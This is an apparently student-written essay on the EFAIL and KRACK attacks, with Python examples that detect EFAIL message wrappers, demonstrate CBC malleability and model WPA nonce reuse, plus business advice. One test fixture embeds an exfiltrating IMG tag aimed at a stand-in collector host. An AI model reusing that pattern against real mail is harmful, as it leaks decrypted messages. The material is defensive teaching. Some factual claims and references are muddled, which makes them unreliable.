Cryptography and data security
1. Research each attack and explain the cryptographic weaknesses that make the attack possible, and explain how the attack is performed.
Cryptography is a method of protecting data and sending it securely to its intended receiver. It protects data such as communication between two systems and online transactions by encoding it so that only the intended receiver can decrypt and understand it. "Crypt" means "hidden" and "graphy" means "writing".
E-Fail Attack:
E-Fail is an attack that targets encrypted emails. It can be carried out by modifying the structure of the encrypted message, by exploiting weaknesses in the encryption standards, or by exploiting specific vulnerable email clients.
It is a security hole in the handling of emails. Most email clients render HTML or JavaScript, so it is easy for an attacker to target the content of the email even though that content is transmitted in encrypted form. It mostly affects Gmail, Microsoft Outlook and Apple Mail.
E-Fail mainly exploits vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails (Nikiforakis et al., 2019).
To carry out the attack, an attacker needs access to the encrypted message and the ability to send an email to at least one of the regular recipients of the original mail.
The attack is performed in two ways:
Direct Exfiltration –
To obtain the decrypted content of an encrypted mail, the attacker modifies the message in a specific way and then sends the changed email to the recipients. The attacker builds a MIME message in which additional parts are placed before and after the encrypted text, so that the ciphertext ends up as the parameter value of an HTML tag.
Here, the attacker creates three body parts:
The first is an IMG tag in which the link (the src attribute) is opened with a quote but not closed.
The second part is the S/MIME ciphertext, and the third part contains the HTML that closes the IMG tag of the first part.
The recipient's client then receives the message in this form:
When the client decrypts and renders the message, the three parts are concatenated, so the decrypted plaintext becomes part of the image URL. Whitespace and other non-printable characters are URL-encoded (whitespace becomes %20), and the client requests the image from the IMG tag's URL, which now contains the plaintext. Thus the attacker receives the plaintext from the victim's client.
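The message shape described above can be checked for on the receiving side. The following is an added example, not code from the original page or from any email client: it parses a constructed multipart message with Python's standard `email` module, flags an HTML part that stops with an attribute quote still open immediately before an encrypted part, and neutralises the attributes and CSS references that would make a client fetch a remote URL when decrypted HTML is rendered (the "disable HTML rendering" mitigation in a narrower form). The message contents, addresses and the `collector.example.invalid` host are constructed for the example; the open-tag test is a heuristic, not a full HTML parser.

```python
import re
from email import message_from_string
from email.message import Message

# Content types that carry ciphertext in S/MIME and PGP/MIME mail.
ENCRYPTED_TYPES = {"application/pkcs7-mime", "multipart/encrypted", "application/octet-stream"}


def ends_inside_open_tag(html: str) -> bool:
    """True if the HTML stops in the middle of a tag with an attribute quote still open.
    Heuristic: the last '<' has no matching '>' and the unfinished tag has an odd number of quotes."""
    html = html.rstrip()
    last_open, last_close = html.rfind("<"), html.rfind(">")
    if last_open < 0 or last_open < last_close:
        return False
    tail = html[last_open:]
    return (tail.count('"') + tail.count("'")) % 2 == 1


def _parts(msg: Message) -> list:
    return msg.get_payload() if msg.is_multipart() else [msg]


def _html_text(part: Message) -> str:
    raw = part.get_payload(decode=True) or b""
    return raw.decode(part.get_content_charset() or "us-ascii", "replace")


def find_exfiltration_wrapper(raw_message: str) -> bool:
    """Flag the direct-exfiltration shape: an HTML part that leaves an attribute open,
    immediately followed by an encrypted part whose plaintext would land inside that attribute."""
    parts = _parts(message_from_string(raw_message))
    for html_part, next_part in zip(parts, parts[1:]):
        if (html_part.get_content_type() == "text/html"
                and next_part.get_content_type() in ENCRYPTED_TYPES
                and ends_inside_open_tag(_html_text(html_part))):
            return True
    return False


# src/background attributes and CSS url() pointing at remote schemes trigger outbound requests.
_REMOTE_ATTR = re.compile(r"""\b(?:src|background)\s*=\s*(["']?)\s*(?:https?:|ftp:|//)[^"'\s>]*\1""", re.I)
_REMOTE_CSS = re.compile(r"""url\(\s*(["']?)\s*(?:https?:|ftp:|//)[^)]*\)""", re.I)


def strip_remote_references(html: str) -> str:
    """Neutralise remote references so rendering decrypted HTML cannot leak it to a server."""
    html = _REMOTE_ATTR.sub('data-blocked=""', html)
    return _REMOTE_CSS.sub("url(about:blank)", html)


# Constructed test messages (not real mail): the first has the three-part wrapper shape.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed test message
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="https://collector.example.invalid/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVIgQ0lQSEVSVEVYVA==
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
"""

BENIGN_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed benign message
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<p>Please see the encrypted part below.</p>
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
Content-Transfer-Encoding: base64

UExBQ0VIT0xERVIgQ0lQSEVSVEVYVA==
--BOUNDARY--
"""

if __name__ == "__main__":
    print("wrapper shape in sample:", find_exfiltration_wrapper(SAMPLE_MESSAGE))
    print("wrapper shape in benign:", find_exfiltration_wrapper(BENIGN_MESSAGE))
    print(strip_remote_references('<img src="https://x.example/a.png">'))
```

The structural check is only useful before decryption, which is why the page's long-term advice (decrypting outside the mail client) is the stronger fix; the sanitiser is the fallback for clients that insist on rendering HTML.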
CBC/CFB Attack:
In this attack, the plaintext is exfiltrated using CBC/CFB gadgets.
In CBC mode, if the attacker knows a block of plaintext, the attacker can modify plaintext blocks by changing the ciphertext. CBC is used in S/MIME, and CFB, which has very similar properties, is used in OpenPGP. In this attack the attacker already knows the first block, and then works on the other blocks by injecting an IMG tag into the encrypted plaintext (Poddebniak and Dresen, 2018).
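The malleability the gadget relies on is a property of the CBC equation P_i = D(C_i) XOR C_{i-1}: flipping bits in C_{i-1} flips the same bits in P_i. The block below is an added example, not code from the paper or from any mail client. It uses a toy 16-byte Feistel block cipher built from HMAC-SHA256 (so it runs without third-party packages; the CBC arithmetic is identical with AES), shows a known plaintext block being rewritten to an arbitrary value without the key, and then shows the defence S/MIME lacked: an encrypt-then-MAC integrity tag that rejects the modified ciphertext before anything is rendered. Key, IV and message bytes are constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, r: int, half: bytes) -> bytes:
    # Round function of the toy cipher: keyed hash truncated to half a block.
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    assert len(plaintext) % BLOCK == 0, "example keeps plaintext block-aligned"
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, cur), prev))   # P_i = D(C_i) XOR C_{i-1}
        prev = cur
    return b"".join(out)


def cbc_gadget(iv: bytes, ciphertext: bytes, index: int, known_block: bytes, chosen_block: bytes):
    """Without the key, rewrite plaintext block `index` from known_block to chosen_block by
    XORing the difference into the preceding ciphertext block (the IV when index is 0).
    Block index-1 then decrypts to garbage; that is the cost the gadget has to hide."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    blocks[index] = xor(blocks[index], xor(known_block, chosen_block))
    return blocks[0], b"".join(blocks[1:])


def _keys(key: bytes):
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()[:BLOCK]
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    return enc_key, mac_key


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: iv || ciphertext || HMAC tag over both."""
    enc_key, mac_key = _keys(key)
    iv = os.urandom(BLOCK)
    body = iv + cbc_encrypt(enc_key, iv, plaintext)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def open_sealed(key: bytes, sealed: bytes) -> bytes:
    enc_key, mac_key = _keys(key)
    body, tag = sealed[:-32], sealed[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed: ciphertext was modified")
    return cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:])


def gadget_is_rejected(key: bytes, plaintext: bytes, index: int, chosen_block: bytes) -> bool:
    """Apply the gadget to a sealed message and report whether the tag check catches it."""
    sealed = seal(key, plaintext)
    iv, ct, tag = sealed[:BLOCK], sealed[BLOCK:-32], sealed[-32:]
    known = plaintext[index * BLOCK:(index + 1) * BLOCK]
    iv2, ct2 = cbc_gadget(iv, ct, index, known, chosen_block)
    try:
        open_sealed(key, iv2 + ct2 + tag)
    except ValueError:
        return True
    return False


# Constructed demo values: a plaintext whose second block is predictable (a MIME header).
KEY = b"constructed-key-"
IV = bytes(range(BLOCK))
PT = b"Content-Type: te" + b"xt/html;charset=" + b"utf-8; secret..."
CHOSEN = b"ATTACKER-CHOSEN!"

if __name__ == "__main__":
    ct = cbc_encrypt(KEY, IV, PT)
    iv2, ct2 = cbc_gadget(IV, ct, 1, PT[16:32], CHOSEN)
    print(cbc_decrypt(KEY, iv2, ct2))
    print("rejected with MAC:", gadget_is_rejected(KEY, PT, 1, CHOSEN))
```

Running it shows block 1 replaced by the chosen text and block 0 turned to garbage while block 2 is untouched; with the tag in place the same modification never reaches the decryptor. OpenPGP's MDC provides a comparable check, but the paper's point was that clients ignored its failure.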
The weaknesses the attack relies on:
- Use of end-to-end email encryption with PGP or S/MIME.
- The attacker already has access to the encrypted messages.
- The victim's client is at risk because it processes the encrypted email messages and renders HTML.
KRACK Attack:
KRACK stands for Key Reinstallation Attack. It is used to steal data transmitted over a network that uses the Wi-Fi WPA security protocol: very sensitive data such as login credentials, credit card details, private chats or any other data the victim transmits over the web. It enables man-in-the-middle attacks that can be used to hijack a website or inject code into it.
Depending on the configuration of the network, it is also possible to inject data and manipulate it in some form of code; for example, the attacker can inject malware of various kinds into websites.
Method:
WPA encryption protects the communication between a user's device and the device providing the Wi-Fi, and it uses a four-way handshake to establish the key. For retransmission, only the third message of the four-way handshake is required. When the victim reconnects to a Wi-Fi network it has already used, the third message of the handshake is resent, so the encryption key can be sent (and installed) multiple times during the third step. If the attacker counts and collects all the retransmissions, the encryption can be broken.
Each time the victim sends a reconnection request over the Wi-Fi, the attacker resends the third handshake message to the victim's device; once the victim's device accepts it, the decryption begins (Chacos and Simon, 2017).
The victim is now caught in the attacker's loop, and the attacker can track all information passing over the network within the same range.
The condition for the attack is that attacker and victim are connected to the same Wi-Fi network.
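Why reinstalling the same key breaks the encryption is easier to see in a small model than in prose. The following is an added example, not code from the cited articles or from any Wi-Fi implementation: it models the client side of the handshake with a counter-mode keystream derived from the session key and a per-frame packet number used as the nonce, mirroring CCMP in shape only. Installing the key resets the packet number to zero, so a retransmitted message 3 makes two different frames share one keystream, and the XOR of the two ciphertexts equals the XOR of the two plaintexts. The `patched` flag models the fix: a key that is already installed is not installed again, so the packet number keeps counting. Session key and frame contents are constructed.

```python
import hashlib
import hmac


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Counter-mode keystream: PRF(key, nonce || counter), stand-in for AES-CTR inside CCMP.
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


class Supplicant:
    """Client side of the four-way handshake. Only message 3 handling is modelled."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.packet_number = 0

    def handle_message3(self, ptk: bytes) -> bool:
        """Install the session key; returns True if the key was (re)installed."""
        if self.patched and self.ptk == ptk:
            return False            # key already in use: keep the current packet number
        self.ptk = ptk
        self.packet_number = 0      # the reset that key reinstallation exploits
        return True

    def encrypt_frame(self, plaintext: bytes) -> bytes:
        nonce = self.packet_number.to_bytes(6, "big")   # 48-bit packet number as nonce
        self.packet_number += 1
        return nonce + xor(plaintext, keystream(self.ptk, nonce, len(plaintext)))


# Constructed frames of equal length so the XOR comparison is exact.
P1 = b"GET /login HTTP/1.1 user=alice"
P2 = b"GET /login HTTP/1.1 user=bobby"


def run_scenario(patched: bool):
    """Handshake completes, one frame is sent, message 3 arrives again, a second frame is sent."""
    s = Supplicant(patched)
    ptk = hashlib.sha256(b"constructed session key").digest()
    s.handle_message3(ptk)
    f1 = s.encrypt_frame(P1)
    s.handle_message3(ptk)          # retransmitted or replayed message 3
    f2 = s.encrypt_frame(P2)
    return f1, f2


def keystream_reused(f1: bytes, f2: bytes, p1: bytes, p2: bytes) -> bool:
    """Detection check: same nonce on both frames and the keystream cancels out under XOR."""
    return f1[:6] == f2[:6] and xor(f1[6:], f2[6:]) == xor(p1, p2)


def recover_second_frame(f1: bytes, f2: bytes, known_first: bytes) -> bytes:
    """With one plaintext known and the keystream shared, the other falls out of the XOR."""
    return xor(xor(f1[6:], f2[6:]), known_first)


if __name__ == "__main__":
    for patched in (False, True):
        f1, f2 = run_scenario(patched)
        print("patched" if patched else "vulnerable", "-> keystream reused:",
              keystream_reused(f1, f2, P1, P2))
```

The same nonce appearing twice on the wire is exactly the symptom a monitoring tool can look for; the real fix in supplicants was the same idea as the `patched` branch, never installing an already-installed key.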
The weaknesses of the process:
- Not using standard HTTPS security for protection.
- Antivirus software on computers is not updated.
- Reuse of an encryption key that has already been used in the past.
- The problem lies in the Wi-Fi standard itself.
2. Explain what can be done with the E-FAIL and KRACK attacks. What does each of them allow an attacker to do, and what kind of access does the attacker need?
E-Fail Attack :
There are two kinds of ways to avoid this attack:
- Short term:
Disable HTML rendering. The attack is mostly carried out through IMG tags and styles, so disabling the rendering of HTML tags and forms in mail reduces the risk of the attack.
Any URL in the decrypted content then appears as plain text; a button can be provided to toggle rendering, and if nothing looks wrong the email can be opened and read safely.
- Long term:
No decryption in the email client. The best way to avoid the attack is to decrypt S/MIME or PGP email in a separate application outside of the email client. Remove the S/MIME or PGP secret keys from the email client, then open the incoming encrypted email, copy and paste the ciphertext into the other application, and let it do the decryption. This prevents the exfiltration channels of email clients.
The attacker first needs access to the S/MIME or PGP emails, for example because they were sent over an HTTP connection or through a compromised email server; only then is the attack possible. Once the attacker has the encrypted email, he can add extra attributes in the tags, and the modified message is received by the victim's client.
KRACK Attack :
If the attacker has access to the Wi-Fi, he can steal all private information, sensitive data, credit card details or anything else transferred over the network.
An attacker within Wi-Fi range captures the secret key and forces the victim to connect to a network the attacker has created. Once the victim accepts it, the attacker can break the protection of any of the victim's credentials.
An attacker can intercept the traffic between the device and the router through which information is exchanged, but if that traffic is encrypted with HTTPS the attacker cannot look into it. In this way the attacker does not obtain the Wi-Fi password, but he can make changes to traffic that is unencrypted. With the help of tools, he can inject packets that may be harmful to the device.
Example:
For anyone using IoT devices, the KRACK attack is a significant concern. If they have installed a connected security camera in their house that does not encrypt its traffic on the Wi-Fi network, an attacker can snoop on raw video footage of the house, which is very risky.
The best ways to avoid the attack are:
- Do not use public hotspots, even password-protected ones at a coffee shop or airport.
- Do not use the same secret key over and over again; change the secret key.
- Use encrypted traffic solutions such as HTTPS.
- Update all Wi-Fi devices and routers with the latest security patches.
3. Assume you have been asked by a business to assess the risks these attacks pose to them. Write some advice for the business. Can the business know if the attacks were used against them? State what the impact of the attacks might have been and what the business should do.
E-Fail Attack:
A real estate company was worried about the attacks going around. The owner had heard about the hijacking of email and the manipulation of data in emails.
His business can be attacked in this way:
His email can be attacked by E-Fail, because he sends the location of a building to clients by email every time. He is not using any protection and knows nothing about the attack, so the scenario below explains the risks attached if he gets attacked.
The server he was using was not protected at all and used HTTP rather than HTTPS, so he can easily be attacked. Each time, he can lose a client: the client may receive a wrong address in an email or get an error while opening an image, and so lose interest in his property.
Advice for the business:
- The business should use HTTPS.
- It should disable HTML rendering, since the attacker can use an IMG tag to deliver wrong output to the victim's client.
- It should arrange a more secure end-to-end channel; in the meantime it should temporarily stop sending encrypted emails, especially PGP-encrypted ones.
Advantages to the attacker:
- He can substitute his own address for the victim's address and steal the victim's customers for his own benefit.
- He can access the victim's encrypted mails, so he can track all the private conversations conducted by mail.
- He can misguide all of the victim's customers via mail.
Krack Attack:
A client who has a real estate business can suffer from the KRACK attack: the victim has started a new business and created a portal where all customers visit the website, register to get bonus points and enter referral codes.
The client travels most of the time for business meetings and connects his laptop to free airport Wi-Fi hotspots. He never pays attention to any messages that pop up when connecting to a network.
The risks his business can face are:
- If the attacker caught him in his loop while he was connecting to the Wi-Fi at the airport, the attacker will have all his login credentials.
- An attacker can gain access to all his credit card details if they are saved in the browser.
- An attacker can attack the portal and damage things in seconds.
Advice for the protection of his business:
- Every time he logs into a website, make sure the connection is encrypted.
- Also make sure the connection stays encrypted for all other online credentials.
- To encrypt web browsing, use a virtual private network.
References
Jose, T. T. Tomy, V. Karunakaran, Anjali Krishna V, A. Varkey and Nisha C.A., "Securing passwords from dictionary attack with character-tree," 2016 International Conference on Wireless Communications, Signal Processing and Networking (WiSPNET), Chennai, 2016, pp. 2301-2307.
Rehman, I. (2018). What Is A Brute Force Attack?. [online] The Official Cloudways Blog. Available at: https://www.cloudways.com/blog/what-is-brute-force-attack/
Johns, M., Nikiforakis, N., Volkamer, M., & Wilander, J. (2019). Web Application Security (Dagstuhl Seminar 18321). Schloss Dagstuhl-Leibniz-Zentrum fuer Informatik.
Poddebniak, D. and Dresen, C. (2018). [online] Usenix.org. Available at: https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-poddebniak.pdf.
Chacos, B. and Simon, M. (2017). KRACK Wi-Fi attack threatens all networks: How to stay safe and what you need to know. [online] PCWorld. Available at: https://www.pcworld.com/article/3233308/krack-wi-fi-security-flaw-faq-tips.html.